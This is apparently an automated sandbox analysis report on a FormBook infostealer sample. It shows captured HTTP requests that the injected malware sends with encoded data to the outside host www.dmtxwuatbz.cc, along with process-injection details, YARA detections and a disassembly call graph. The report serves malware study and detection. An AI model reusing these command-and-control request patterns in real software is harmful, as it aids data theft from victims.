                                          Data Raw: 59 62 43 4c 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 48 55 48 78 52 38 59 45 36 38 77 4a 39 6f 58 65 47 77 6b 44 6e 52 69 4f 31 63 73 42 36 62 39 77 30 77 32 4e 35 37 46 30 41 63 67 51 67 52 6d 34 48 70 41 58 39 31 65 61 76 6d 4c 6c 2f 2b 50 42 66 75 45 39 51 5a 77 35 6a 43 42 32 76 7a 5a 30 6e 33 69 67 2f 79 66 76 61 43 37 4d 63 41 51 2b 7a 61 4e 4c 46 30 57 47 43 32 75 65 5a 44 76 58 77 71 6b 46 61 44 58 77 54 49 6b 4e 57 58 77 50 4d 35 48 6e 78 67 45 50 6c 44 2f 30 51 6a 74 72 35 34 79 44 6a 4e 51 68 64 2b 42 49 39 5a 64 38 2b 38 52 6a 56 39 62 37 4a 47 77 2b 4c 4f 33 48 79 46 34 59 6a 56 36 7a 56 6a 7a 2f 70 4a 54 46 51 2f 76 31 41 3d 3d
                                          Data Ascii: YbCL=tsf8FNiIpLuGJHUHxR8YE68wJ9oXeGwkDnRiO1csB6b9w0w2N57F0AcgQgRm4HpAX91eavmLl/+PBfuE9QZw5jCB2vzZ0n3ig/yfvaC7McAQ+zaNLF0WGC2ueZDvXwqkFaDXwTIkNWXwPM5HnxgEPlD/0Qjtr54yDjNQhd+BI9Zd8+8RjV9b7JGw+LO3HyF4YjV6zVjz/pJTFQ/v1A==


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          38192.168.2.749745172.67.210.102806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:42.557594061 CEST807OUTPOST /lfkn/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.dmtxwuatbz.cc
                                          Origin: http://www.dmtxwuatbz.cc
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.dmtxwuatbz.cc/lfkn/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 76 39 77 56 41 32 4b 34 37 46 7a 41 63 67 59 41 52 76 38 48 70 39 58 39 78 67 61 74 43 4c 6c 2b 65 50 42 66 65 45 39 6e 4e 7a 34 7a 43 50 69 66 7a 66 77 6e 33 69 67 2f 79 66 76 61 47 46 4d 64 6f 51 69 53 71 4e 5a 55 30 56 61 79 32 68 49 4a 44 76 47 67 71 34 46 61 44 6c 77 58 41 43 4e 56 76 77 50 4f 78 48 6e 67 67 62 42 6c 44 35 71 67 69 76 69 35 64 51 42 44 5a 6f 6e 39 72 56 41 4d 4e 75 77 6f 68 7a 35 33 78 33 6c 59 2b 4c 36 4a 71 42 51 55 59 4e 61 69 52 69 2b 33 58 53 67 65 73 35 49 43 65 72 6a 37 6d 46 42 4e 70 61 32 62 55 41 52 6e 63 6d 64 72 30 43 35 67 49 3d
                                          Data Ascii: YbCL=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAIv9wVA2K47FzAcgYARv8Hp9X9xgatCLl+ePBfeE9nNz4zCPifzfwn3ig/yfvaGFMdoQiSqNZU0Vay2hIJDvGgq4FaDlwXACNVvwPOxHnggbBlD5qgivi5dQBDZon9rVAMNuwohz53x3lY+L6JqBQUYNaiRi+3XSges5ICerj7mFBNpa2bUARncmdr0C5gI=


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          39192.168.2.749746172.67.210.102806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:45.087105036 CEST1820OUTPOST /lfkn/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.dmtxwuatbz.cc
                                          Origin: http://www.dmtxwuatbz.cc
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.dmtxwuatbz.cc/lfkn/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 74 73 66 38 46 4e 69 49 70 4c 75 47 4a 6d 6b 48 33 77 38 59 49 4b 38 2f 58 74 6f 58 58 6d 77 65 44 6e 64 69 4f 30 5a 72 41 49 33 39 77 6e 49 32 4b 62 44 46 79 41 63 67 57 67 52 69 38 48 70 73 58 35 64 61 61 74 4f 62 6c 36 75 50 42 39 57 45 37 53 78 7a 32 7a 43 50 67 66 7a 61 30 6e 33 4e 67 2f 69 41 76 62 32 46 4d 64 6f 51 69 51 69 4e 61 46 30 56 4a 69 32 75 65 5a 44 7a 58 77 71 45 46 65 6d 51 77 58 4e 2f 4e 6b 50 77 50 75 68 48 6c 53 34 62 4a 6c 44 37 72 67 69 4e 69 35 68 6d 42 44 46 43 6e 2b 32 4f 41 4f 74 75 79 35 49 52 6c 30 64 30 38 4b 6d 76 34 49 61 33 62 6d 45 2b 58 45 56 66 2b 41 2f 52 68 65 73 57 44 78 7a 6b 33 65 66 57 54 72 4a 75 35 4a 38 33 5a 33 4a 70 59 62 73 47 72 33 66 70 71 77 41 78 54 64 4e 6e 45 56 4d 76 58 4c 47 39 6d 53 47 78 56 30 39 63 47 58 2f 34 65 4a 48 48 42 36 41 67 77 4b 37 34 5a 56 6e 71 6c 61 77 65 35 47 72 55 47 47 75 53 59 46 31 71 52 72 37 6d 2f 4c 56 63 49 44 36 46 62 57 74 44 4b 6e 2b 56 78 51 69 4b 55 66 52 49 62 57 6d 55 34 4f 6c 38 78 78 2f 4a 54 [TRUNCATED]
                                          Data Ascii: YbCL=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAI39wnI2KbDFyAcgWgRi8HpsX5daatObl6uPB9WE7Sxz2zCPgfza0n3Ng/iAvb2FMdoQiQiNaF0VJi2ueZDzXwqEFemQwXN/NkPwPuhHlS4bJlD7rgiNi5hmBDFCn+2OAOtuy5IRl0d08Kmv4Ia3bmE+XEVf+A/RhesWDxzk3efWTrJu5J83Z3JpYbsGr3fpqwAxTdNnEVMvXLG9mSGxV09cGX/4eJHHB6AgwK74ZVnqlawe5GrUGGuSYF1qRr7m/LVcID6FbWtDKn+VxQiKUfRIbWmU4Ol8xx/JTCB4XdJM95fyR01R1fF2Z5H0RWhK5UX1RstW0EBImie9DwSfZ3rdUnTzuZWg/aIZdcSbRWVuxaP/71yr5L5xXudpnmKI9K6pYv7I2a7JtWEXY4p8Gcx7n2tB6/dYFJXYzlHVvSGZfuwzI1DNBSgqPb76k9QsIShAkVoX3E4/crGuRH2s7iyFdG/2PUJ2+a462hBQz0GpJ3+uu6qBveT+fDrNoP5LnXQ/+KDuh46XucQyzaf8f6oVNJXXtdJlIC3N7O9SpX8ANCtsykGaNd4mx5g7k7Ums9nkv3/cYzY5o2Ruh4MCmgGzB1FdgVmnoAcUtyVQJ5vviBOel4rlHrVnfFYNPXIzq6QXuvLPuy70ImGbXmTXY2za1qDr2Xs5Ge+pIhZtp/37KR6vPlkVEME5mZtQ++SvBVg0JXzqj+QJ5BuCktChzzfbrkhNKLo93qJ5vnk4fLYnurbBKsMadXlCMU6dVugG6QID/hV0vUbM5DUMOvJd/2/uSlqZ+zorcd43u+EttcWwaDTwUjbbizqwawtyVjzbL8MaWgK5mYmC1ga/VWo5a0GTwj/yibYfbj/WwcGMpBpieKy/vtLWx40+CrR90STHvN4MqxFImiA0PbbHMQgKVn0gCtpbVTkx4wO4Jp7asyCsFcr/8JpfJ8bfmUEbc2c5JvnHkbG [TRUNCATED]


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          40192.168.2.749747172.67.210.102806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:47.617620945 CEST527OUTGET /lfkn/?YbCL=gu3cG9GLpLv0C38agzY8Nc5HI9FnWTYycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT/Ba73/TyhXTi+N+fxoCuIe0q13OxeEQrax/xffncDH6aKqzo3DUBHR/D&fhW=BLvXr6e0EhyxeX HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.dmtxwuatbz.cc
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:4
                                          Start time:10:52:02
                                          Start date:04/07/2024
                                          Path:C:\Users\user\Desktop\TOgpmvvWoj.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\TOgpmvvWoj.exe"
                                          Imagebase:0xe10000
                                          File size:1'180'160 bytes
                                          MD5 hash:93E69765594E80AD7F8C1E906F145046
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:10:52:03
                                          Start date:04/07/2024
                                          Path:C:\Windows\SysWOW64\svchost.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\TOgpmvvWoj.exe"
                                          Imagebase:0x690000
                                          File size:46'504 bytes
                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1485611383.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1484985282.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1486102715.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:true

                                          General

                                          Target ID:8
                                          Start time:10:52:15
                                          Start date:04/07/2024
                                          Path:C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe"
                                          Imagebase:0x300000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.3763045399.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:9
                                          Start time:10:52:16
                                          Start date:04/07/2024
                                          Path:C:\Windows\SysWOW64\clip.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\clip.exe"
                                          Imagebase:0x180000
                                          File size:24'576 bytes
                                          MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3762941792.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3758152425.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3763129724.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          Reputation:moderate
                                          Has exited:false

                                          General

                                          Target ID:11
                                          Start time:12:28:10
                                          Start date:04/07/2024
                                          Path:C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe"
                                          Imagebase:0x300000
                                          File size:140'800 bytes
                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:13
                                          Start time:12:28:22
                                          Start date:04/07/2024
                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                          Imagebase:0x7ff722870000
                                          File size:676'768 bytes
                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:4.1%
                                            Dynamic/Decrypted Code Coverage:0.4%
                                            Signature Coverage:2.9%
                                            Total number of Nodes:2000
                                            Total number of Limit Nodes:185
                                            execution_graph 97683 e37e93 97684 e37e9f __getstream 97683->97684 97720 e3a048 GetStartupInfoW 97684->97720 97686 e37ea4 97722 e38dbc GetProcessHeap 97686->97722 97688 e37efc 97689 e37f07 97688->97689 97805 e37fe3 58 API calls 3 library calls 97688->97805 97723 e39d26 97689->97723 97692 e37f0d 97693 e37f18 __RTC_Initialize 97692->97693 97806 e37fe3 58 API calls 3 library calls 97692->97806 97744 e3d812 97693->97744 97696 e37f27 97697 e37f33 GetCommandLineW 97696->97697 97807 e37fe3 58 API calls 3 library calls 97696->97807 97763 e45173 GetEnvironmentStringsW 97697->97763 97700 e37f32 97700->97697 97703 e37f4d 97704 e37f58 97703->97704 97808 e332f5 58 API calls 3 library calls 97703->97808 97773 e44fa8 97704->97773 97707 e37f5e 97708 e37f69 97707->97708 97809 e332f5 58 API calls 3 library calls 97707->97809 97787 e3332f 97708->97787 97711 e37f71 97712 e37f7c __wwincmdln 97711->97712 97810 e332f5 58 API calls 3 library calls 97711->97810 97793 e1492e 97712->97793 97715 e37f90 97716 e37f9f 97715->97716 97811 e33598 58 API calls _doexit 97715->97811 97812 e33320 58 API calls _doexit 97716->97812 97719 e37fa4 __getstream 97721 e3a05e 97720->97721 97721->97686 97722->97688 97813 e333c7 36 API calls 2 library calls 97723->97813 97725 e39d2b 97814 e39f7c InitializeCriticalSectionAndSpinCount __getstream 97725->97814 97727 e39d30 97728 e39d34 97727->97728 97816 e39fca TlsAlloc 97727->97816 97815 e39d9c 61 API calls 2 library calls 97728->97815 97731 e39d39 97731->97692 97732 e39d46 97732->97728 97733 e39d51 97732->97733 97817 e38a15 97733->97817 97736 e39d93 97825 e39d9c 61 API calls 2 library calls 97736->97825 97739 e39d72 97739->97736 97741 e39d78 97739->97741 97740 e39d98 97740->97692 97824 e39c73 58 API calls 4 library calls 97741->97824 97743 e39d80 GetCurrentThreadId 97743->97692 97745 e3d81e __getstream 97744->97745 97837 e39e4b 97745->97837 97747 e3d825 97748 e38a15 __calloc_crt 58 API calls 97747->97748 97751 e3d836 97748->97751 97749 e3d841 @_EH4_CallFilterFunc@8 __getstream 97749->97696 97750 e3d8a1 GetStartupInfoW 97756 e3d8b6 97750->97756 97758 e3d9e5 97750->97758 97751->97749 97751->97750 97752 e3daad 97846 e3dabd LeaveCriticalSection _doexit 97752->97846 97754 e38a15 __calloc_crt 58 API calls 97754->97756 97755 e3da32 GetStdHandle 97755->97758 97756->97754 97756->97758 97759 e3d904 97756->97759 97757 e3da45 GetFileType 97757->97758 97758->97752 97758->97755 97758->97757 97845 e3a06b InitializeCriticalSectionAndSpinCount 97758->97845 97759->97758 97760 e3d938 GetFileType 97759->97760 97844 e3a06b InitializeCriticalSectionAndSpinCount 97759->97844 97760->97759 97764 e45184 97763->97764 97765 e37f43 97763->97765 97766 e38a5d __malloc_crt 58 API calls 97764->97766 97769 e44d6b GetModuleFileNameW 97765->97769 97767 e451aa _memmove 97766->97767 97768 e451c0 FreeEnvironmentStringsW 97767->97768 97768->97765 97770 e44d9f _wparse_cmdline 97769->97770 97771 e38a5d __malloc_crt 58 API calls 97770->97771 97772 e44ddf _wparse_cmdline 97770->97772 97771->97772 97772->97703 97774 e44fc1 __wsetenvp 97773->97774 97775 e44fb9 97773->97775 97776 e38a15 __calloc_crt 58 API calls 97774->97776 97775->97707 97777 e44fea __wsetenvp 97776->97777 97777->97775 97779 e38a15 __calloc_crt 58 API calls 97777->97779 97780 e45041 97777->97780 97781 e45066 97777->97781 97784 e4507d 97777->97784 97917 e44857 58 API calls __beginthread 97777->97917 97778 e32f95 _free 58 API calls 97778->97775 97779->97777 97780->97778 97782 e32f95 _free 58 API calls 97781->97782 97782->97775 97918 e39006 IsProcessorFeaturePresent 97784->97918 97786 e45089 97786->97707 97788 e3333b __IsNonwritableInCurrentImage 97787->97788 97941 e3a711 97788->97941 97790 e33359 __initterm_e 97792 e33378 _doexit __IsNonwritableInCurrentImage 97790->97792 97944 e32f80 97790->97944 97792->97711 97794 e14948 97793->97794 97804 e149e7 97793->97804 97795 e14982 IsThemeActive 97794->97795 97979 e335ac 97795->97979 97799 e149ae 97991 e14a5b SystemParametersInfoW SystemParametersInfoW 97799->97991 97801 e149ba 97992 e13b4c 97801->97992 97803 e149c2 SystemParametersInfoW 97803->97804 97804->97715 97805->97689 97806->97693 97807->97700 97811->97716 97812->97719 97813->97725 97814->97727 97815->97731 97816->97732 97819 e38a1c 97817->97819 97820 e38a57 97819->97820 97822 e38a3a 97819->97822 97826 e45446 97819->97826 97820->97736 97823 e3a026 TlsSetValue 97820->97823 97822->97819 97822->97820 97834 e3a372 Sleep 97822->97834 97823->97739 97824->97743 97825->97740 97827 e45451 97826->97827 97832 e4546c 97826->97832 97828 e4545d 97827->97828 97827->97832 97835 e38d68 58 API calls __getptd_noexit 97828->97835 97830 e4547c HeapAlloc 97831 e45462 97830->97831 97830->97832 97831->97819 97832->97830 97832->97831 97836 e335e1 DecodePointer 97832->97836 97834->97822 97835->97831 97836->97832 97838 e39e6f EnterCriticalSection 97837->97838 97839 e39e5c 97837->97839 97838->97747 97847 e39ed3 97839->97847 97841 e39e62 97841->97838 97871 e332f5 58 API calls 3 library calls 97841->97871 97844->97759 97845->97758 97846->97749 97848 e39edf __getstream 97847->97848 97849 e39f00 97848->97849 97850 e39ee8 97848->97850 97859 e39f21 __getstream 97849->97859 97875 e38a5d 97849->97875 97872 e3a3ab 58 API calls __NMSG_WRITE 97850->97872 97852 e39eed 97873 e3a408 58 API calls 6 library calls 97852->97873 97856 e39ef4 97874 e332df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97856->97874 97857 e39f2b 97862 e39e4b __lock 58 API calls 97857->97862 97858 e39f1c 97881 e38d68 58 API calls __getptd_noexit 97858->97881 97859->97841 97863 e39f32 97862->97863 97865 e39f57 97863->97865 97866 e39f3f 97863->97866 97883 e32f95 97865->97883 97882 e3a06b InitializeCriticalSectionAndSpinCount 97866->97882 97869 e39f4b 97889 e39f73 LeaveCriticalSection _doexit 97869->97889 97872->97852 97873->97856 97877 e38a6b 97875->97877 97878 e38a9d 97877->97878 97880 e38a7e 97877->97880 97890 e3594c 97877->97890 97878->97857 97878->97858 97880->97877 97880->97878 97907 e3a372 Sleep 97880->97907 97881->97859 97882->97869 97884 e32fc7 __dosmaperr 97883->97884 97885 e32f9e RtlFreeHeap 97883->97885 97884->97869 97885->97884 97886 e32fb3 97885->97886 97916 e38d68 58 API calls __getptd_noexit 97886->97916 97888 e32fb9 GetLastError 97888->97884 97889->97859 97891 e359c7 97890->97891 97903 e35958 97890->97903 97914 e335e1 DecodePointer 97891->97914 97893 e359cd 97915 e38d68 58 API calls __getptd_noexit 97893->97915 97896 e3598b RtlAllocateHeap 97897 e359bf 97896->97897 97896->97903 97897->97877 97899 e359b3 97912 e38d68 58 API calls __getptd_noexit 97899->97912 97903->97896 97903->97899 97904 e359b1 97903->97904 97905 e35963 97903->97905 97911 e335e1 DecodePointer 97903->97911 97913 e38d68 58 API calls __getptd_noexit 97904->97913 97905->97903 97908 e3a3ab 58 API calls __NMSG_WRITE 97905->97908 97909 e3a408 58 API calls 6 library calls 97905->97909 97910 e332df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97905->97910 97907->97880 97908->97905 97909->97905 97911->97903 97912->97904 97913->97897 97914->97893 97915->97897 97916->97888 97917->97777 97919 e39011 97918->97919 97924 e38e99 97919->97924 97923 e3902c 97923->97786 97925 e38eb3 _memset __call_reportfault 97924->97925 97926 e38ed3 IsDebuggerPresent 97925->97926 97932 e3a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 97926->97932 97929 e38f97 __call_reportfault 97933 e3c836 97929->97933 97930 e38fba 97931 e3a380 GetCurrentProcess TerminateProcess 97930->97931 97931->97923 97932->97929 97934 e3c840 IsProcessorFeaturePresent 97933->97934 97935 e3c83e 97933->97935 97937 e45b5a 97934->97937 97935->97930 97940 e45b09 5 API calls 2 library calls 97937->97940 97939 e45c3d 97939->97930 97940->97939 97942 e3a714 EncodePointer 97941->97942 97942->97942 97943 e3a72e 97942->97943 97943->97790 97947 e32e84 97944->97947 97946 e32f8b 97946->97792 97948 e32e90 __getstream 97947->97948 97955 e33457 97948->97955 97954 e32eb7 __getstream 97954->97946 97956 e39e4b __lock 58 API calls 97955->97956 97957 e32e99 97956->97957 97958 e32ec8 DecodePointer DecodePointer 97957->97958 97959 e32ea5 97958->97959 97960 e32ef5 97958->97960 97969 e32ec2 97959->97969 97960->97959 97972 e389e4 59 API calls __beginthread 97960->97972 97962 e32f07 97963 e32f58 EncodePointer EncodePointer 97962->97963 97964 e32f2c 97962->97964 97973 e38aa4 61 API calls 2 library calls 97962->97973 97963->97959 97964->97959 97967 e32f46 EncodePointer 97964->97967 97974 e38aa4 61 API calls 2 library calls 97964->97974 97967->97963 97968 e32f40 97968->97959 97968->97967 97975 e33460 97969->97975 97972->97962 97973->97964 97974->97968 97978 e39fb5 LeaveCriticalSection 97975->97978 97977 e32ec7 97977->97954 97978->97977 97980 e39e4b __lock 58 API calls 97979->97980 97981 e335b7 DecodePointer EncodePointer 97980->97981 98044 e39fb5 LeaveCriticalSection 97981->98044 97983 e149a7 97984 e33614 97983->97984 97985 e33638 97984->97985 97986 e3361e 97984->97986 97985->97799 97986->97985 98045 e38d68 58 API calls __getptd_noexit 97986->98045 97988 e33628 98046 e38ff6 9 API calls __beginthread 97988->98046 97990 e33633 97990->97799 97991->97801 97993 e13b59 __write_nolock 97992->97993 98047 e177c7 97993->98047 97997 e13b8c IsDebuggerPresent 97998 e4d4ad MessageBoxA 97997->97998 97999 e13b9a 97997->97999 98000 e4d4c7 97998->98000 97999->98000 98001 e13bb7 97999->98001 98030 e13c73 97999->98030 98271 e17373 59 API calls Mailbox 98000->98271 98133 e173e5 98001->98133 98002 e13c7a SetCurrentDirectoryW 98005 e13c87 Mailbox 98002->98005 98005->97803 98006 e4d4d7 98011 e4d4ed SetCurrentDirectoryW 98006->98011 98008 e13bd5 GetFullPathNameW 98149 e17d2c 98008->98149 98010 e13c10 98158 e20a8d 98010->98158 98011->98005 98014 e13c2e 98015 e13c38 98014->98015 98272 e74c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98014->98272 98174 e13a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98015->98174 98018 e4d50a 98018->98015 98021 e4d51b 98018->98021 98273 e14864 98021->98273 98022 e13c42 98024 e13c55 98022->98024 98182 e143db 98022->98182 98193 e20b30 98024->98193 98027 e4d523 98280 e17f41 98027->98280 98030->98002 98044->97983 98045->97988 98046->97990 98300 e30ff6 98047->98300 98049 e177e8 98050 e30ff6 Mailbox 59 API calls 98049->98050 98051 e13b63 GetCurrentDirectoryW 98050->98051 98052 e13778 98051->98052 98053 e177c7 59 API calls 98052->98053 98054 e1378e 98053->98054 98313 e13d43 98054->98313 98056 e137ac 98057 e14864 61 API calls 98056->98057 98058 e137c0 98057->98058 98059 e17f41 59 API calls 98058->98059 98060 e137cd 98059->98060 98327 e14f3d 98060->98327 98063 e4d3ae 98398 e797e5 98063->98398 98064 e137ee Mailbox 98351 e181a7 98064->98351 98068 e4d3cd 98069 e32f95 _free 58 API calls 98068->98069 98072 e4d3da 98069->98072 98074 e14faa 84 API calls 98072->98074 98076 e4d3e3 98074->98076 98080 e13ee2 59 API calls 98076->98080 98077 e17f41 59 API calls 98078 e1381a 98077->98078 98358 e18620 98078->98358 98082 e4d3fe 98080->98082 98081 e1382c Mailbox 98083 e17f41 59 API calls 98081->98083 98084 e13ee2 59 API calls 98082->98084 98085 e13852 98083->98085 98086 e4d41a 98084->98086 98087 e18620 69 API calls 98085->98087 98088 e14864 61 API calls 98086->98088 98090 e13861 Mailbox 98087->98090 98089 e4d43f 98088->98089 98091 e13ee2 59 API calls 98089->98091 98093 e177c7 59 API calls 98090->98093 98092 e4d44b 98091->98092 98094 e181a7 59 API calls 98092->98094 98095 e1387f 98093->98095 98096 e4d459 98094->98096 98362 e13ee2 98095->98362 98098 e13ee2 59 API calls 98096->98098 98100 e4d468 98098->98100 98106 e181a7 59 API calls 98100->98106 98102 e13899 98102->98076 98103 e138a3 98102->98103 98104 e3313d _W_store_winword 60 API calls 98103->98104 98105 e138ae 98104->98105 98105->98082 98107 e138b8 98105->98107 98108 e4d48a 98106->98108 98109 e3313d _W_store_winword 60 API calls 98107->98109 98110 e13ee2 59 API calls 98108->98110 98111 e138c3 98109->98111 98113 e4d497 98110->98113 98111->98086 98112 e138cd 98111->98112 98114 e3313d _W_store_winword 60 API calls 98112->98114 98113->98113 98115 e138d8 98114->98115 98115->98100 98116 e13919 98115->98116 98118 e13ee2 59 API calls 98115->98118 98116->98100 98117 e13926 98116->98117 98378 e1942e 98117->98378 98119 e138fc 98118->98119 98121 e181a7 59 API calls 98119->98121 98123 e1390a 98121->98123 98126 e13ee2 59 API calls 98123->98126 98126->98116 98128 e193ea 59 API calls 98130 e13961 98128->98130 98129 e19040 60 API calls 98129->98130 98130->98128 98130->98129 98131 e13ee2 59 API calls 98130->98131 98132 e139a7 Mailbox 98130->98132 98131->98130 98132->97997 98134 e173f2 __write_nolock 98133->98134 98135 e1740b 98134->98135 98136 e4ee4b _memset 98134->98136 99213 e148ae 98135->99213 98138 e4ee67 GetOpenFileNameW 98136->98138 98140 e4eeb6 98138->98140 98142 e17d2c 59 API calls 98140->98142 98144 e4eecb 98142->98144 98144->98144 98146 e17429 99241 e169ca 98146->99241 98150 e17da5 98149->98150 98151 e17d38 __wsetenvp 98149->98151 98152 e17e8c 59 API calls 98150->98152 98153 e17d73 98151->98153 98154 e17d4e 98151->98154 98157 e17d56 _memmove 